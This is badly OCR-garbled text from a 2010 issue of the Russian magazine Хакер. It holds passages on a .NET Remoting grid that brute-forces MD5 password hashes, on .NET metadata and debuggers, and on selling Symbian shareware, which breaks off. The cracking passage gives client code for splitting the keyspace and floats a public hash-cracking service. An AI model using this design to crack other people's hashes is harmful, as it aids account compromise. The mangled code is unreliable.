ТсрСІіепДСЬаппеІ ейаппеі = пем 
ТсрСІіепССйаппеІ ( ) ; 

СйаппеІЗегѵісез . ЕедізСегСйаппеІ (ейаппеі) ; 
//зарегистрировать удаленный класс в 
локальном домене 
ЕешоЕіпдСопЕідигаІііоп . 
ВедізЕегШеІІКпоѵтСІіегЩТуре ( 

ЕуреоЕ (ВоЕ) , //удаленный класс 
//ШІ удаленного класса 
"Сер: //ІосаІйозС : 39993/ВоС" ) ; 

Здесь ІІПІ задает местоположение удаленного класса. 
Протокол (в данном случае, ТСР] соответствует протоколу 
каналов, зарегистрированных в доменах приложений. 
Идентификатор машины (Іосаібозі:, но в реальных условиях 
— ІР-адрес или имя компьютера] задает сервер, экспорти- 
рующий класс Во! и таким образом указывает компьютер, 
на котором будет создан объект. Далее в строке ИРІ через 
двоеточие указывается номер порта, на котором сервер 
ожидает вызовы (в нашем случае, порт с номером 39993]. 




> іпіо 

Формат запуска 
прилагающейся 
системы: в файле 
ЬазЬ.Іхі: записываем 
целевой хеш, после 
чего запускаем сер- 
вер сІізітіЬиІе.ехе и 
клиент сііепі.ехе. 




> СІѴСІ 



На диске тебя ждут 
исходные коды рас- 
смотренной системы 
с подробными ком- 
ментариями в виде 
проекта для Місгозоіі: 
Ѵізиаі 5ЕисІ іо 2008. 



ХАКЕР 04 /135/ 10 



► 097 










ССЮІЫ6 




И напоследок: для того, чтобы класс Воі под- 
держивал удаленное взаимодействие, необхо- 
димо использовать в качестве базового класса 
ЗузІет.МагзЬаІВуРеЮЬіесЬ 

Объявление удаленного класса 

риЫіс сіазз ВоС : МагзЬаІВуКеТОЪз есЬ 
{ 

} 

КТО НЕ РАБОТАЕТ -ТОТ ЗАВИС 

Построив теоретический фундамент, рассмо- 
трим особенности функционала клиентской 
части системы, подкрепляя рассуждения кодом. 
Чтобы ресурсы удаленного класса стали доступ- 
ными для клиента, он должен создать экзем- 
пляр этого класса: 

Вок Ьгаіп = пеѵ? Вок ( ) ; 

Далее работа с объектом Ьгаіп будет про- 
исходить, как с локальным, но при этом все 
расчеты, которые выполняются в классе этого 
объекта, будут производиться сервером. Как ни 
странно, наша система распределенных вычис- 
лений должна грамотно распределить (про- 
стите за тавтологию] задачу между ресурсами 
клиентов. Напомню, что задачей у нас является 
диапазон всевозможных комбинаций симво- 
лов, из которых, по мнению пользователя (он 
определяет алфавит, на основе которого гене- 
рируется диапазон), может состоять пароль. 
Пусть каждая рабочая станция в нашей грид- 
сети сама определит диапазон строк, который 
она сможет перебрать за адекватное время. 
«Предпочтения» рабочей станции мы будем 
определять с помощью частоты процессора и 
количества ядер (процессоров): 

Определение характеристик клиента 

//кол-во ядер 

іпк Соге= (ІпВ32 ) ЗузВет. 

Епѵігоптепк . РгосеззогСошік ; 

//тактовая частота (МГц) 

іпк Такк = ( Іпк32 ) Кедізкгу . СекѴаІие ( 

@ " НКЕ У_ЬОС АЬ_МАС Н I ЫЕ \ 
НАКВМАКЕ\БЕЗСКІРТІСЖ\ЗузВет\ 
СепкгаІРгосеззогЛО " , "~МН 2 " , 0); 



Составим простейшую функцию, в результате 
работы которой получится число, равное числу 
строк (диапазон) для нашего клиента: 

іпк КапдеѴаІие = Соге * Такс * 9 ; 
//функция для расчета диапазона 

Изменяя значение третьего коэффициента, 
мы будем изменять среднее время перебора 
адекватного (установленного на основе моих 
экспериментов) диапазона строк. 

Процесс перебора состоит из трех простых 
шагов: 

1. Чтение строки из диапазона; 

2. Генерация хеша текущей строки; 

3. Сравнение сгенерированнго хеша с целевым 
хешем. Если равны — отправить результат 
(строку] серверу в виде сообщения о найден- 
ном пароле. Если не равны — выполнить шаги 
1-3; 

4. В случае конца диапазона отправить резуль- 
тат взять новый диапазон для перебора или 
завершить работу. 

Код, выполняющий перебор, здесь рассматри- 
вать не будем, так как и он и подробные ком- 
ментарии к нему ждут тебя на диске. 

ТОВАРИЩ КОМАНДИР 

Несмотря на тот факт, что сервер в «распре- 
делена» является одной из важнейших ее 
частей, самый трудный этап реализации уже 
позади. Так уж получилось, что «толстый» кли- 
ент оказался еще и «умнее» сервера: и ширину 
диапазона для себя он определяет и пароль 
брутит. Однако на серверную часть ложатся не 
менее ответственные задачи генерации строк и 
учета перебранных диапазонов. Не углубляясь 
в технические детали, опишу процесс генера- 
ции диапазонов строк. 

Администратор сети определяет множество 
символов, которые составляют алфавит для 
генерации строк. Например, в роли алфавита 
могут быть спецсимволы, цифры, комбинация 
«абссІе39#» и тому подобные комбинации сим- 
волов. Далее происходит взаимооднозначное 
соответствие между строкой алфавита и мно- 
жеством чисел (строке «Ьхсѵ4М» соответствует 
множество «1234567»]. Серверная часть рабо- 
тает со строкой символов как с п-мерной систе- 
мой счисления, то есть при генерации новой 



строки происходит инкрементация текущего 
числа на 1. Прикладная математика может быть 
полезной ;). Весь функционал серверной части 
предоставляется клиентам в методах удален- 
ного класса Вок Рассмотрим метод ВеУоЬ(іпі: 
<количество_строк_диапазона>]. Если клиенту 
потребуется получить задание, достаточно в уже 
созданном объекте Ьгаіп вызвать метод ОеУоЬ: 

Ьгаіп . СекЬоЪ ( "ширина диапазона") ; 

Таким образом, отправляется запрос сер- 
веру, который начинает выполнять коман- 
ды, содержащиеся в методе. Результат 
выполнения отправляется клиенту, который 
использует полученные данные на свое 
усмотрение. 

БѴ^ДЕЕ РЯДОМ, НО НЕ ВСЕМ 

Становятся заметны перспективы создания 
«облачных» приложений: например игр с 
потрясающей графикой, расчет элементов 
которой полностью ложится на сервер, а 
клиенты лишь выводят игроку результаты на 
экран монитора в виде красивой картинки. В 
частности, разработанная нами система может 
оказаться полезной, когда очередной хеш не 
находится ни в одном из онлайн-хранилищ 
«слепков» паролей, а также не поддается 
Джону Потрошителю а. к. а боки 1Не Віррег. 

Для таких случаев каждый уважающий себя 
взломщик/реп-тестер/зесигііу-консультант 
должен иметь в своем инструментарии прило- 
жение, реализующее распределенные вычис- 
ления. Кстати, раз уж мы упомянули сервисы 
«всуе», то почему бы не сделать из нашей 
сети сервис, который будет полезен не только 
нам, но и другим пользователям? Только пред- 
ставь: отчаявшийся хеш-крэкер заходит на 
наш сайт, вбивает в формочку неприступный 
хеш (номер кошелька ;]] и ждет результатов, 
зависящих только от масштабов нашей сети. 
Нам даже не нужно трогать клиентскую часть: 
достаточно доставить серверу любым из спо- 
собов целевой хеш, а дальше он «разберется» 
самостоятельно. А ведь это только распреде- 
лена, выполняющая брут МИб-хешей. Трудно 
представить, сколько еще задач ждут своего 
распределения! □с 
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НЕМНОГО ФИЛОСОФИИ 

Если говорить о дебаге приложений в клас- 
сическом понимании, то .ЫЕТ-приложения тут 
стоят особняком, что, в сущности, понятно — 
архитектура .ЫЕТ Егатеѵѵогк коренным образом 
отличается от стандартных ѴѴіп32-приложений. 
Каждый .ЫЕТ-исполняемый файл, по сути, 
является обыкновенным РЕ-файлом. Но при 
этом надо помнить, что компилятор при соз- 
дании этого РЕ-файла вставляет в начало 
инструкцию, вызывающую гипііте-систему 
СЕР. Таким образом, в момент старта .ЫЕТ- 
исполняемого файла управление передается 
СБР. Отличительной особенностью исполняе- 
мых .ЫЕТ файлов является то, что эти файлы 
осуществляют импорт системных функций толь- 
ко из одной боблиотеки — тзсогее.сііі и в этой 
библиотеке они вызывают только одну функцию 
— _СогеЕхеМаіп. Другими словами, этот вызов 
является своеобразным пропуском в мир для 
файлов, написанных на .ЫЕТ языках. В этом 
можно убедиться, просто просмотрев таблицу 
импорта любого .ЫЕТ исполняемого файла — 
ничего кроме _СогеЕхеМаіп ты там не найдешь. 
Если присмотреться к картинке, иллюстри- 
рующей формат .ЫЕТ-исполняемого файла, то 
можно увидеть, что половина всего логического 
содержимого .ЫЕТ-приложения составляют 
метаданные. Если ты встречаешь это слово 
впервые, то самое простое и самое точное для 
него определение — «данные, которые описы- 
вают другие данные». 

Что такое «метаданные» в контексте .ЫЕТ 
Егатеѵѵогк? Это набор программных элементов 
ЕХЕ-файла, таких как типы и реализации мето- 



дов. И без знания метаданных, полноценный 
дебаг.ЫЕТ приложений просто невозможен. 
Благодаря технологии метаданных СБР узнает, 
какие во время выполнения потребуются типы 
и какие методы должны быть вызваны. Это 
дает среде возможность выполнить должную 
настройку для более эффективного выполнения 
приложения. Механизм запроса метаданных 
называется отражением (гейесбоп). Библиотеки 
классов .ЫЕТ Егатеѵѵогк имеют целый набор 
методов отражения, позволяющих любому при- 
ложению (и не только СБР) запросить метадан- 
ные другого приложения. 

Метаданные используются для различных 
целей — они устраняют необходимость в заго- 
ловочных и библиотечных файлах при компи- 
ляции, так как все сведения о типах-членах, 
на которые есть ссылки, содержатся в файле 
с МЭІБ-кодом, в котором они реализованы. 
Компиляторы могут читать метаданные прямо 
из управляемых модулей. 

Ѵізиаі Эіисііо использует метаданные для того, 
чтобы помочь разработчикам писать код. 

К примеру, на основе анализа метаданных в 
Ѵізиаі Эіисііо. ЫЕТ, построена реализация такой 
удобной штуки как ІпІеШЭепзе. При наличии 
ІпІеШЭепзе мы, набирая имя метода, видим на 
экране всплывающий список с аргументами 
этого метода. Ѵізиаі Эіисііо. ЫЕТ дополняет это 
средство, показывая еще и все члены типа. 

В процессе верификации кода СБР использует 
метаданные, чтобы убедиться, что код соверша- 
ет только безопасные операции. Метаданные 
позволяют сериализовать поля объекта в 
блок памяти на удаленной машине и затем 



десериализовать их, восстановив объект и его 
состояние на удаленной машине. Метаданные 
позволяют сборщику мусора отслеживать жиз- 
ненный цикл объектов. Сборщик мусора может 
определить тип любого объекта и, благодаря 
метаданным, знает, какие поля в объекте ссы- 
лаются на другие объекты. 

Вся информация о том, как организованы 
метаданные, организована в таблицы с разным 
форматом. 

Однако, все это лишь слова. Как же можно 
использовать метаданные в реальном дебаге (и 
не только управляемого кода)? Что мы можем 
там найти? 

Существует три категории таблиц метадан- 
ных — это определения, ссылки и декларации. 
Вкратце рассмотрим самые важные и интерес- 
ные из определений: 

ТуреОеІ — содержит по одной записи для каждо- 
го типа, определенного в модуле и указывает 
на записи таблиц МеІбосЮеІ, РгорегІуБеІ и 
ЕѵепЮеІ, содержащие соответственно све- 
дения о методах, свойствах и событиях этого 
типа. 

МеІІіосШеІ — содержит по одной записи для 
каждого метода, определенного в моду- 
ле. Также имеются определения БіеІсЮеІ, 
РагатОеІ, РгорегІуБеІ и ЕѵепЮеІ, которые, 
как ты уже догадался, содержат записи, иден- 
тифицирующие поля, параметры, свойства 
и события. В стандартных таблицах ссылок 
нашего внимания заслуживают такие табли- 
цы, как АззетЫуРеІ, которая содержит по 
одной записи для каждой сборки, на которую 
ссылается модуль, МобиІеРеІ — содержит по 
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Дебаггер СогйЬд в действии 
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Если тебе лень 
каждый раз грузить 
программы в ІЮА5М 
— при отладке про- 
грамм в окне вызовов 
(саіізіаск) достаточ- 
но дважды кликнуть 
на метод итоговой, 
ѵізиа І.зЕисІ іо. 
бІІЮезідпегНозЕ 
Абб и дебаггер сам 
отразит деком пли ро- 
ванный И-код твоей 
программы 



Просмотр регистров машины 
в процессе отладки 
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Просмотр метаданных.ЫЕТ-приложения 



любой сборки .ЫЕТ, как ехе-файла, так и 611 — ее манифест, 
метаданные типов и инструкции И. При этом надо сказать, 
что сам по себе дизассемблер ІЮА5М в корне не похож 
на дизассемблеры ѴѴіп32-программ, настолько отличается 
его выдача — программа лежит как на ладони! Эх, все бы 
дизассемблеры были такими интуитивно понятными и удоб- 
ными... 

Кстати, если тебя заинтересует спецификация МЭИ, ее ты 
сможешь найти здесь — /ѵѵѵѵ.есппа-іпіегпабопаі.ога . или 
на диске к журналу. Зачем она нужна? Знаю нескольких 
«немного не в себе» программистов, которые пишут именно 
на нем :). 

ЗА РАБОТУ! 

МісгозоТі: предоставляет программисту два приличных 
дебаггера, которые отлично справляются со своей работай. 
Встречай: СогОЬд — дебаггер, запускающийся из команд- 
ной строки и 0111-дебаггер ОЬдСЕВ. Второй, визуальный 
ОЬдСЕВ ты можешь видеть в стандартном окне Ѵізиаі 
ЗШбіо. 





> сЫ 

На дискеты най- 
дешь приведенный 
в статье код, а также 
дизассемблеры 
и отладчики под .ЫЕТ 
Егатеѵѵогк. 
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• Ыодз.тзбп.сот/ 
]тз1а — в блоге 
Майка Стола собрана 
куча вещей и советов, 
посвященных отлад- 
ке управляемого кода 

• деекзѵѵбЬЫодз. 
пеТ/.пеІопппутіпб/ 
агсЬіѵе/2006/03/14 
/72262^здх — спра- 
вочник по командам 
ѴѴіпОВС+505, абріиз. 
ѵбз, сам отладчик 

\и скриптабріиз.ѵбзза- 
бираем отсюда — ѵѵѵѵѵѵ. 
тісгозоІЕсот/ѵѵЬбс/ 
беѵТооІз/беЬиддіпд/ 
беТаиІЕтзрх . 



одной записи для каждого РЕ-модуля, в котором реализова- 
ны типы, на которые он ссылается. 

Кроме того, в таблице ссылок имеются записи ТуреВеІ и 
МетЬегРеЕ На самом деле, таблиц метаданных в гораздо 
больше, здесь коротко описаны лишь те, которые нас смогут 
заинтересовать. 

Для того, чтобы просмотреть записи метаданных .ЫЕТ- 
приложения, загрузи его в ІЮА5М (о нем — чуть ниже) и 
нажми СМ+М. 

В качестве лирического отступления от темы, хочу ска- 
зать, что техники инфекта .ЫЕТ-файлов, существующие на 
данный момент, неразрывно связаны с использованием 
метаданных. К примеру, вирус Оопиі: использует для этого 
технику замещения СЕР-заголовка и метаданных .ЫЕТ- 
исполняемого файла. Так как на самом деле СЕР представ- 
ляет собой набор СОМ-интерфейсов, то для открытия мета- 
данных .ЫЕТ используются интерфейсы ІМеіаОаІаОізрепзег 
и ІМеІаОаІаОізрепзегЕх, а для непосредственного измене- 
ния метаданных — I МеЕа ОаЕа ЕтіЕ и ІМеІаВаІаАззетЫуЕтіЕ 
Теперь о главном оружии диззасемблера .ЫЕТ-программ 
— программулине ІЕ0А5М, диззассмблере языка МісгозоЕ 
ІЕ. Ее ты сможешь найти в утилитах, прилагаемых к Ѵізиаі 
Эіибіо. Эта утилита позволяет просмотреть содержимое 



ОТ РЕДАКЦИИ 



Пользуясь случаем, обращаем твое внимание на ста- 
рые материалы из братского журнала ІТ Спец: 

• ѵѵ\л/ѵѵ.хакер.ги/ппада2Іпе/х5/066/058/1 .азр — .ЫЕТ 
Секретам: добыча исходного кода приложений (очень 
рекомендуем!) 

• ѵѵѵѵѵѵ.хакер.ги/ппадагіпе/ха/1 08/1 18/1 .азр — Хакерский 
подход: юзаем ассемблер в сишарповых программах 



Дебаггер среды выполнения СогОЬд — отличное средство 
для поиска и исправления ошибок в программах, работаю- 
щих в .ІЧЕТ Егатеѵѵогк. 

СогОЬд может легко дизассемблировать в нативный или 
ІЬ-код по команде біз[аззетЫе] , осуществить вывод пере- 
менных по их именам или устанавливать их значение вруч- 
ную командой зек Просмотреть значения регистров машины 
при выполнении управляемого кода также можно, для этого 
тебе придется использовать команду гед. 

Подробнее информацию о командах СогйЬд можно найти 
в М50ІЧ. Нельзя обойти вниманием еще один отладчик 
командной строки (уф, сколько отладчиков развелось!) — 
МбЬд, также входящий в стандартный набор Ѵізиаі ЭШбіо, 
который является весомым дополнением к СогОЬд. 

О визуальном отладчике ОВССЬЕ я расскажу лишь вскользь 
— программисту, использующему в работе Ѵізиаі Эіибіо, этот 
отладчик знаком не понаслышке, потому что является неот- 
ъемлемой ее частью. 

ДЕБАГ НА ПРАКТИКЕ - 
ИНСТРУКЦИЯ ПО ПРИМЕНЕНИЮ 

А сейчас коротко остановимся на тех методах, которые 
помогут тебе сделать отладку кода более практичной и удоб- 
ной. 

Средства, предоставленные программисту для осуществле- 
ния полноценной отладки кода, представлены в простран- 
стве имен ЗузІет.ОіадпозЬсз.ОеЬид. 

Для удобства в отладке программ, написанных на .ІЧЕТ- 
овских языках, предусмотрен метод АззегіО, который сге- 
нерирует исключение, если не выполнится определенное 
условие: 

Зузкет. Біадпозкісз . БеЬид .Аз зегк (условие , . . .) 

В своем коде при отладке ты можешь легко обеспечить 
трассировку стека вызовов — теперь это делается проще 
простого: в пространстве имен ЭузІет.ОіадпозЬсз есть 
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Дебаггер 0В6СІ.К в Ѵізиаі Біисііо 
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кода 
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класс ВТаскТгасе, который можно задействовать 
для получения всего стека вызовов. Метод 
СеіРгатеіО) вернет первый фрейм объекта 
ВіаскТгасе — того, что выполняется в данный 
момент, а метод СеТМеТЬобО вернет ссылку на 
объект МеТЬобВазе, соответствующий методу 
заданного фрейма. Получится примерно вот 
так: 

ЗСаскТгасе зкаск = пеѵі 
ЗкаскТгасе ( 0 ) ; 



ИогЦпЦ і = 0; і < 

зкаск . РгатеСоипк ; і++) 

{ 

Сопзоіе .ШгікеЬіпе (зкаск. 
СекРгаше(і) . СеШекЬоб ( ) .Ыате) ; 

} 

Полный вариант кода, который отражает теку- 
щее состояние стека вызовов, ищи на диске. 
Только не стоит путать класс ВіаскТгасе, пример 
которого вы видели, со свойством ВіаскТгасе 
в классе Ехсербоп. Кстати, поговорим о нем. 
Свойство ЗіаскТгасе типа Ехсербоп поистине 



волшебно. Обращаясь к нему, ты на самом деле 
вызываешь код СЕВ. При генерации исклю- 
чения механизм СЕВ регистрирует место, где 
была выполнена команда ібгоѵѵ. Когда фильтр 
перехвата захватывает исключение, СЕВ реги- 
стрирует место перехвата. Теперь, если в блоке 
саісб обратиться к свойству ЗіаскТгасе сгене- 
рированного объекта исключения, код этого 
свойства вызовет СЕН. При этом СИР построит 
строку, идентифицирующие те методы, вызван- 
ные между исключением и срабатыванием 
фильтра, перехватившего исключение. 

По умолчанию в Ѵізиаі Віибіо для отладки 
включен только безопасный (тападеб) код. 

Если хочешь подключить режим отладки 
всего кода, лезь в меню и подключай опцию 
ЕІптападеб собе бебиддіпд. 

ЗАКЛЮЧЕНИЕ 

В данной статье я попытался собрать и кратко 
описать те инструменты, которые помогут тебе в 
дизассемблировании, дебаге и отладке управ- 
ляемого кода. Если содержимого статьи тебе 
покажется мало или стандартные средства 
отладки управляемого кода тебе покажутся 
не очень впечатляющими, начиная с .ЫЕТ 
Егатеѵѵогк 2.0 реализована поддержка отладки 
управляемого кода в стандартном отладчике 
ѴѴіпОВС. 

Удачного компилирования и да пребудете 
тобой Сила! ц-ц 



ФОРМАТ ИСПОЛНЯЕМОГО ФАЙЛА (СБОРКИ) В .Ш РРАМЕѴѴОКК 

МЕТАДАННЫЕ СБОРКИ 
(т. н. манифест) 



МЕТАДАННЫЕ ТИПОВ 
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РЕСУРСЫ СБОРКИ 



ХАКЕР 04 / 135 / 10 



► 101 











ССЮІЫб 



■ ■ Дмитрий Тарасов гооШсІІагагоѵ.ги 




МОБИЛЬНЫЕ 

ШАРОВАРЫ 

В этой статье я расскажу о том, как 
создавать и продавать зііагеѵѵаге- 
программы для мобильных аппаратов на 
базе ЗутЬіап. Все написанное основано на 
моем личном опыте в построении малого 
бизнеса по разработке и продаже ПО для 
смартфонов, так что, есть вероятность, 
что и у тебя все это получится :). 




ЧТО ТАКОЕ ЗНАРЕѴѴАРЕ В ВАЗРЕЗЕ 
МОБИЛЬНЫХ ТЕХНОЛОГИИ 

ЗЬагеѵѵаге — это прикладное программное 
обеспечение, которое создается группой (или 
одним) разработчиком с целью извлечения 
прибыли от продажи лицензий конечным 
пользователям (елы-палы, ну и определение. 
Прямо «нанес удар тупым предметом с целью... 
:) — прим. ред.»]. 

Не секрет, что большинство программистов 
пишут программы в той или иной степени на 
заказ. Будь то заказ прямого работодателя, 
либо разовые заказы в случае фриланса — все 
это работа по чужому ТЗ (если повезет), либо 
вообще по чужому описанию, построенному по 
принципу «хочу кнопочку, которая всем делает 
хорошо». В 99,99% случаев начинающие про- 
граммисты вполне комфортно себя чувствуют 
в таких условиях (особенно фрилансеры), но 
по прошествии времени некоторые из них 
теряют интерес к разработке ПО, придуманного 
другими людьми и концентрируются на вопло- 
щении своих собственных идей, надеясь при 
этом еще и заработать. Можно писать целую 
книгу о том, как люди становятся произво- 
дителями ЗЬагеѵѵаге, но, если обобщить, то к 
этому разработчиков подталкивают следующие 
причины: 

наличие идей программных продуктов, 
которые могут быть воплощены своими 
силамищеприятие корпоративного образа 
жизни (работа от звонка до звонка);желание 



работать на себя, а не на дядю, который даже 
не вызывает симпатищуверенность в вос- 
требованности своих идей и в возможности 
хорошо на них заработать; наличие «предпри- 
нимательской жилки». 

Специфика данной деятельности примени- 
тельно к настольным операционным системам 
за 10 лет существования сферы деятельности 
была уже неоднократно описана, поэтому я 
заострю внимание лишь на особенностях раз- 
работки ПО для мобильных устройств. Итак, 
чем примечательна сфера мобильного ПО: 
много абсолютно несовместимых друг с другом 
платформщпецифика разрабатываемого ПО 
(потребности пользователя ПК и телефона 
пересекаются очень редко);специфическое 
взаимодействие пользователя с аппара- 
том (многие даже не подозревают, что на 
телефон можно устанавливать полезные 
программы);больше способов достав- 
ки контента пользователям мобильных 
устройствщтносительная зависимость от про- 
изводителей устройств и операторов сотовой 
связи; относительная сложность освоения 
технологии разработки. 

Может показаться, что процесс вывода продук- 
та, скажем, для телефонов ІМокіа на рынок сво- 
дится к схеме «Придумал-Реализовал-Начал 
продавать». Но на самом деле все несколько 
сложнее. Далее я буду описывать процесс 
организации продажи своего ПО сточки зре- 
ния разработчика под ОС ЗутЬіап. Повторюсь, 



предполагается, что ты хочешь начать зараба- 
тывать, продавая собственное ПО. Сразу могу 
сказать, что заниматься этим в свободное от 
работы время не получится. Слишком много 
усилий требуется приложить, чтобы добиться 
осязаемого результата. Если тебя это не пугает, 
едем дальше. 

ПОЧЕМУ ЗѴМВІАМ? 

Выбор данной ОС в качестве Іа где!- платформы 
обуславливается исключительно прагмати- 
ческими соображениями. Как программист- 
одиночка ты не сможешь покрыть все имею- 
щиеся на данный момент на рынке платформы. 
Есть смысл сосредоточиться на одной опера- 
ционной системе. ЗутЬіап занимает лидирую- 
щее положение на рынке смартфонов (более 
50%), соответственно обеспечивает доступ 
к большей аудитории, а, соответственно, к 
потенциально бОлышим доходам. Кроме того, 
из всех существующих мобильных платформ 
только ЗутЬіап позволяет получить относи- 
тельно низкоуровневый доступ к функциям 
ОС и реализовать серьезный функционал, 
использующий функции телефонии (отправка/ 
прием 5М5, перехват звонков, и так далее). 
Если прибавить к этому огромное количество 
пользователей, то выбор и вовсе очевиден. Тут 
стоит отметить, тем не менее, что писать под 
ЗутЬіап вначале непросто, поскольку нара- 
ботанные практики и парадигмы программи- 
рования, применяющиеся при разработке под 
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ѴѴіпсІоѵѵз, используются здесь в меньшей сте- 
пени, чем при разработке под ѴѴіпсІоѵѵз МоЬіІе, 
например. Поэтому, даже если ты опытный 
разработчик под ѴѴіпсІоѵѵз, І_іпих или Мае 05, 
тебе все равно придется потратить довольно 
много времени на адаптацию к ЭутЬіап. 

Еще один немаловажный момент: тебе при- 
дется зарегистрировать себя в качестве 
индивидуального предпринимателя (или 000], 
поскольку без этого нельзя получить необходи- 
мый для разработки идентификатор издателя. 
Кроме того, без подобного статуса ты не смо- 
жешь заключать договора с дистрибьюторами 
и другими партнерами. Соответственно, при- 
дется платить налоги, сдавать декларации, и 
вообще разбираться в особенностях налогоо- 
бложения и всяких валютных переводов. 

ПРОЦЕСС СОЗДАНИЯ КОНКУРЕНТОСПО- 
СОБНОГО ПРОДУКТА 

Если ты в совершенстве овладел технологиями 
разработки программного обеспечения, то у 
меня есть плохие новости — это только начало. 
Из личного опыта могу сказать, что непосред- 
ственно на разработку уходит максимум 30% 
времени. Остальные 70% — это маркетинг, 
продумывание концепций продуктов, налажи- 
вание связей с партнерами, работа со своим 
сайтом и сайтами-партнерами и так далее. 
Важно хорошенько уяснить, что без качествен- 
но написанного кода и хорошо продуманной 
архитектуры ПО, твой продукт не будет успеш- 
ным. Но и выполнение этих двух условий 
также не гарантирует, что он будет успешным, 
поскольку любой продукт нужно продвигать. 

Так что тебе предстоит изучить на практике 
особенности работы с клиентами, освоить мар- 
кетинговые приемы, а также научиться догова- 
риваться с партнерами. 

Попробуй представить себе аудиторию поль- 
зователей своих программ. Ты должен ясно 
понимать, что только ориентированность 
на пользователей со всего мира принесет 
тебе вожделенные денежные знаки. Если ты 
будешь делать ПО только на русском языке 
в надежде, что русские (или тем более укра- 
инские] пользователи будут его покупать, то 
никогда в жизни не заработаешь. Поэтому 
тебе понадобится знание английского языка 
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МегаФон. 



на уровне свободной переписки как минимум. 

В идеале же нужно иметь версии программ на 
как можно большем количестве языков. 

Итак, процесс вывода продукта на рынок в 
общем и целом соответствует схеме «раз- 
работка — продвижение». Рассмотрим теперь 
более подробно эти этапы сточки зрения 
ЭутЬіап-разработчика, занимающегося созда- 
нием прикладных утилит или игр. 

РАЗРАБОТКА ПО ПОД 5ѴМЕШ 

Эту тему я уже неоднократно освещал в 
предыдущих статьях, поэтому здесь я хотел бы 
сосредоточиться на нескольких очень важных 
для понимания моментах: 

Данная ОС целиком и полностью построена 
на объектно-ориентированной парадигме. 
Поэтому если ты слаб в ООП, то у тебя будут 
сложности с разбором банального Неііо ѴѴогІсІ. 
Вывод — придется потратить время на прочте- 
ние какой-нибудь хорошей книжки по с++, это 
сэкономит массу времени в будущем. 

В процессе разработки тебе понадобится 
постоянный доступ к структурированной инфор- 
мации. Несмотря на то, что крупнейший ресурс 
для разработчиков — іюгит.покіа.сот, позво- 
ляет найти ответ на практически любой вопрос, 
я настоятельно рекомендую книгу “Оеѵеіоріпд 
Эегіез 60 Арріісабопз. А дыбе Іо г ЭутЬіап 05 
С++ Оеѵеіорегз”, а также — все книги издатель- 
ства 5утЬіап Ргезз. Они написаны на понятном 
английском и по ценности информации мало 
с чем сравнимы. Указанная книга, например, 
окупилась мне десятикратно уже на следующий 
день после покупки. Не советую тратить время 
на книги, доступные на русском языке — там 
дикий ад :]. Вот и еще один аргумент в пользу 
того, что с английским придется подружиться 
также хорошо, как и с с++. 

Тебе потребуется доступ к многочисленным 
устройствам на базе 5утЬіап. Не рассчитывай 
отделаться эмулятором и одним ІЧокіа N97, 
например. В частности, у каждого из семейств 
платформы 560 есть свои особенности, кото- 



рые проявляются при разработке программ, 
использующих функции телефонии, и которые 
невозможно выявить без непосредственного 
тестирования на реальном аппарате. У меня, 
например, около двадцати телефонов на базе 
560, каждый из которых постоянно использует- 
ся при тестировании. 

Специфическая среда разработки. Могу прямо 
сказать, что ЮЕ, более убогую, чем СагЬісІе.С++ 
я не встречал никогда. По какой-то причине 
Ыокіа перестала поддерживать МісгозоО: Ѵізиаі 
5і:исІіо. N ЕТ. Кроме того, установка и настройка 
всех необходимых 5ЭК и утилит уже давно 
вошла в историю как один из самых болез- 
ненных процессов во вселенной. Эмулятор же 
по-прежнему бесполезен в случае разработки 
серьезных утилит, задействующих, собственно, 
функции телефона. 

ЭутЬіап — специфическая система, поначалу 
она кажется чем-то очень непривычным и 
неудобным, но это проходит по мере нако- 
пления опыта. Придется изучить несколько 
ключевых концепций ЭутЬіап, которые будут 
для тебя совершенно новыми, но избежать 
этого невозможно. Тем не менее, стремление 
к мультиплатформенности начинает затраги- 
вать и ЭутЬіап, что выражается в переносе 
стандартных библиотек с/с++ (которые непо- 
нятно зачем там вообще нужны], а также в 
популяризации технологии 01. 01 — это очень 
хорошая инициатива, но важно понимать, что 
она затрагивает исключительно ІЛ. Поэтому 
разработчику системных утилит все равно при- 
дется вернуться к ЭутЬіап с++. 

Теперь представим, что ты планируешь 
написать программу, предназначенную для 
фильтрации входящих звонков и сообщений. 
Такие программы, к слову, самые востребо- 
ванные пользователями — «черных списков» 
реализовано довольно много, и тем не менее, 
их покупают. Так вот, функционал в подобную 
программу хочется добавить самый разноо- 
бразный — это и блокирование звонков от 
контактов, выбранных из заданной книги, и 
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блокирование зтз/ттз, и возможность не 
сбрасывать, а глушить вызовы, отклонение 
неизвестных или скрытых номеров, переадре- 
сация, массу различных фильтров и так далее. 
Поскольку мы условились считать, что ты 
делаешь все самостоятельно, то реализация 
всего этого функционала в одном приложении 
займет много времени. Не стремись в первый 
же релиз включить все желаемые функции, это 
приведет лишь к нестабильной работе прило- 
жения, что может лишить тебя большой части 
потенциальных пользователей. Лучше выбрать 
некоторые базовые функции и довести их до 
разумного совершенства, после чего выпускать 
продукт на рынок. А потом уже по мере реали- 
зации добавлять новые функции — это избавит 
тебя от массы проблем и привлечет лояльных 
пользователей, видящих, что программа раз- 
вивается, а не стоит на месте. Именно по 
такой схеме я начинал продавать свой продукт 
Віаскіізі: МоЬіІе. Как результат — это одно из 
наиболее популярных приложений, реализую- 
щих функционал черного списка для ЗутЬіап. 

ПРОДАЖА ПО 

Теперь самое интересное. Предположим, ты 
написал программу или игру, которая готова 
к продаже. Назревают вопросы — а как поль- 
зователи будут ее оплачивать и как защитить 
приложение от использования без оплаты? 
Схема покупки программы через онлайн- 
магазины софта все еще возможна, но крайне 
неэффективна. Проблема в том, что мобильный 
телефон независим от компьютера, поэтому 
попытка заставить пользователя покупать 
программу для телефона через ПК приве- 
дет к резкому уменьшению числа продаж. 
Следовательно необходимо предоставить кли- 
ентам возможность покупки софта непосред- 
ственно с помощью мобильного телефона. Мне 
повезло: я рано усвоил эту истину, и поэтому в 
первых релизах я реализовал систему оплаты 
софта посредством отправки платных 5М5 
на специально зарегистрированный для этих 
целей короткий номер. Также был реализован 
механизм триала — программой можно было 
пользоваться не более 30 дней, либо блокиро- 
вать не более 10 входящих событий. Причем 
пользователю не надо было самостоятельно 
набирать текст регистрационного сообщения, 
программа все делала самостоятельно при 
активации функции «Оплатить». Недостатком 




;пЮОКІ№ІРЕ1 



Рогііпд іо іЬе 
5ут$5ап РІаіІЪглі 




Рогііпд Іо ІНе ЗутЬіап РІаІІогт: Ореп МоЬіІе Реѵеіортепі іп С/С++ (ЗутЬіап 

Магк ѴѴіІсох (АиіЬог) 

N 0 си 5*0 тег геѵіеиз уеЪ Ве іЬе Йге*. 



ІІ5І Ргісе: $60:00 



